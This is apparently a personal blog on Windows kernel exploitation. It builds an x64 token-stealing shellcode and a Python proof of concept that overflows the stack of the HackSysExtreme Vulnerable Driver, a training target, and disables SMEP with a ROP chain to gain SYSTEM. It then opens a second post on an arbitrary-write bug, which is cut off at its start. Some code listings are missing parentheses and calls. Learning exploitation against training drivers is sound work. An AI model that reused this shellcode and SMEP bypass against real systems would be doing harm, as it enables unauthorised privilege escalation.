Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aims to get myself more familiar with the x64 architecture, which is a far more common in 2020, and understand protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As apart of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process, only run in context of kernel mode. Recall that a process is a β€œcontainer”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking β€œHow does this help us?” Especially, if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debugee machine (see my post on setting up a debugging enviornment). In addition, I noticed on Windows 10, I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200)

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the β€œprocess address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

As you can see, the result is 7. This is not the value we want- it is actually the inverse of it. Logic tells us, we should take the inverse of 0xf, -0xf.

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Openenig a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s Use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

β€˜Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is ran from). From there, we could spawn cmd.exe from (and in context) of our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcessId() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProgress() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current threads _ETHREAD structure. As a point of contention, know that _KTHREAD is the first entry in _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax,0B8h]

RAX alread contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current proccess is! The PID for the current process at this time is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.


Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY


ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveLinkProcess element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out , in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the regsiter for the error code. NTSTATUS, when a value of 0 is returned, means the operations successfully performed.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and the call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of β€œflags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, lets talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypassses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Athough we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to β€œdisable SMEP” at all. Let’s think outside the box! Instead of β€œgoing to the mountain”- why not β€œbring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a β€œuser mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use the an overflow to outline bypasssing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gagdets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

pop <reg> ; ret
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
mov cr4, <reg> ; ret
User mode payload address

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we won’t probably won’t be able to directly manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of CR4 in the ecx register (the β€œsecond” 32-bits of the RCX register.)

As you can see, this ROP gadget is β€œlocated” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not ran as an administrator) will not give us the full address of this. However, if you remove the first 3 bytes, the rest of the β€œaddress” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. Howerver, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking β€œOkay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired intruction, but there was an unecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick with brevity- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

                           CH    CL

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

payload = bytearray(
    "\xCC" * 50

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.


Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load RSP into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would β€œreturn” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have succesfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi

payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x348
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)

# Error handling if function fails
if not base:
    print "[+] EnumDeviceDrivers() function call failed!"

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = ("\x41" * 2056)

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		        # Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

os.system("cmd.exe /k cd C:\\")

This shellcode adds 0x40 to RSP as you can see from above. This is specific to the process I was exploiting, to resume execution. Also in this case, RAX was already set to 0. Therefore, there was no need to xor rax, rax.

As you can see, SMEP has been bypassed!

SMEP Bypass via PTE Overwrite

Perhaps in another blog I will come back to this. I am going to go back and do some more research on the memory manger unit and memory paging in Windows. When that research has concluded, I will get into the low level details of overwriting page table entries to turn user mode pages into kernel mode pages. In addition, I will go and do more research on pool memory in kernel mode and look into how pool overflows and use-after-free kernel exploits function and behave.

Thank you for joining me along this journey! And thank you to Morten Schenk, Alex Ionescu, and Intel. You all have aided me greatly.

Please feel free to contact me with any suggestions, comments, or corrections! I am open to it all.

Peace, love, and positivity :-)

Exploit Development: Windows Kernel Exploitation - Arbitrary Overwrites (Write-What-Where)

13 November 2019 at 00:00


In a previous post, I talked about setting up a Windows kernel debugging environment. Today, I will be building on that foundation produced within that post. Again, we will be taking a look at the HackSysExtreme vulnerable driver. The HackSysExtreme team implemented a plethora of vulnerabilities here, based on the IOCTL code sent to the driver. The vulnerability we are going to take look at today is what is known as an arbitrary overwrite.

At a very high level what this means, is an adversary has the ability to write a piece of data (generally going to be a shellcode) to a particular, controlled location. As you may recall from my previous post, the reason why we are able to obtain local administrative privileges (NT AUTHORITY\SYSTEM) is because we have the ability to do the following:

  1. Allocate a piece of memory in user land that contains our shellcode
  2. Execute said shellcode from the context of ring 0 in kernel land

Since the shellcode is being executed in the context of ring 0, which runs as local administrator, the shellcode will be ran with administrative privileges. Since our shellcode will copy the NT AUTHORITY\SYSTEM token to a cmd.exe process- our shell will be an administrative shell.

Code Analysis

First let’s look at the ArbitraryWrite.h header file.

Take a look at the following snippet:

typedef struct _WRITE_WHAT_WHERE
    PULONG_PTR What;
    PULONG_PTR Where;

typedef in C, allows us to create our own data type. Just as char and int are data types, here we have defined our own data type.

Then, the WRITE_WHAT_WHERE line, is an alias that can be now used to reference the struct _WRITE_WHAT_WHERE. Then lastly, an aliased pointer is created called PWRITE_WHAT_WHERE.

Most importantly, we have a pointer called What and a pointer called Where. Essentially now, WRITE_WHAT_WHERE refers to this struct containing What and Where. PWRITE_WHAT_WHERE, when referenced, is a pointer to this struct.

Moving on down the header file, this is presented to us:

    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere

Now, the variable UserWriteWhatWhere has been attributed to the datatype PWRITE_WHAT_WHERE. As you can recall from above, PWRITE_WHAT_WHERE is a pointer to the struct that contains What and Where pointers (Which will be exploited later on). From now on UserWriteWhatWhere also points to the struct.

Let’s move on to the source file, ArbitraryWrite.c.

The above function, TriggerArbitraryWrite() is passed to the source file.

Then, the What and Where pointers declared earlier in the struct, are initialized as NULL pointers:


Then finally, we reach our vulnerability:

        DbgPrint("[+] Triggering Arbitrary Write\n");

        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode

        *(Where) = *(What);

As you can see, an adversary could write the value pointed by What to the memory location referenced by Where. The real issue is that there is no validation, using a Windows API function such as ProbeForRead() and ProbeForWrite, that confirms whether or not the values of What and Where reside in user mode. Knowing this, we will be able to utilize our user mode shellcode going forward for the exploit.


As you can recall in the last blog, the IOCTL code that was used to interact with the HEVD vulnerable driver and take advantage of the TriggerStackOverflow() function, occurred at this routine:

After tracing the IOCTL routine that jumps into the TriggerArbitraryOverwrite() function, here is what is displayed:

The above routine is part of a chain as displayed as below:

Now time to calculate the IOCTL code- which allows us to interact with the vulnerable routine. Essentially, look at the very first routine from above, that was utilized for my last blog post. The IOCTL code was 0x222003. (Notice how the value is only 6 digits, even though x86 requires 8 digits in a memory address. 0x222003 = 0x00222003) The instruction of sub eax, 0x222003 will yield a value of zero, and the jz short loc_155FB (jump if zero) will jump into the TriggerStackOverflow() function. So essentially using deductive reasoning, EAX contains a value of 0x222003 at the time the jump is taken.

Looking at the second and third routines in the image above:

sub eax, 4
jz short loc_155E3


sub eax, 4
jz short loc_155CB

Our goal is to successfully complete the β€œjump if zero” jump into the applicable vulnerability. In this case, the third routine shown above, will lead us directly into the TriggerArbitraryOverwrite(), if the corresponding β€œjump if zero” jump is completed.

If EAX is currently at 0x222003, and EAX is subtracted a total of 8 times, let’s try adding 8 to the current IOCTL code from the last exploit- 0x222003. Adding 8 will give us a value of 0x22200B, or 0x0022200B as a legitimate x86 value. That means by the time the value of EAX reaches the last routine, it will equal 0x222003 and make the applicable jump into the TriggerArbitraryOverwrite() function!

Proof Of Concept

Utilizing the newly calculated IOCTL, let’s create a POC:

import struct
import sys
import os
